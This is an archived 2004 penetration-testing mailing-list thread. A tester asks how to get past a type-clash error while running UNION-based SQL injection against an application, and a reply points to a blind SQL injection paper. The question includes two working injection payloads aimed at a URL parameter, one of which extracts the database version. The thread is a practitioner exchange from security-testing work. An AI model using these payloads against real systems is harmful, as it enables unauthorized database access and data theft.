Penetration Testing mailing list archives
RE: SQL Injection & ncompatible with int issue
From: "Amichai Shulman" <shulman () imperva com>
Date: Sun, 13 Jun 2004 13:15:00 +0200
Try "Blind Folder SQL Injection"; it should do the trick. URL is
http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html

-----Original Message-----
From: Peter Bair [mailto:peterbair100 () hotmail com]
Sent: Thursday, June 10, 2004 1:51 AM
To: pen-test () securityfocus com
Subject: SQL Injection & ncompatible with int issue

I am currently testing an application that reveals its tables. I know the exact columns to perform a union, but when I try the following:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+--

RESULT: Operand type clash: text is incompatible with int

So I will try the solution:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--

RESULT: Invalid column name 'text'.

I know that "text" is in the correct position and I tried 'text'. Is this app safe or can I go further?

Thanks for any help.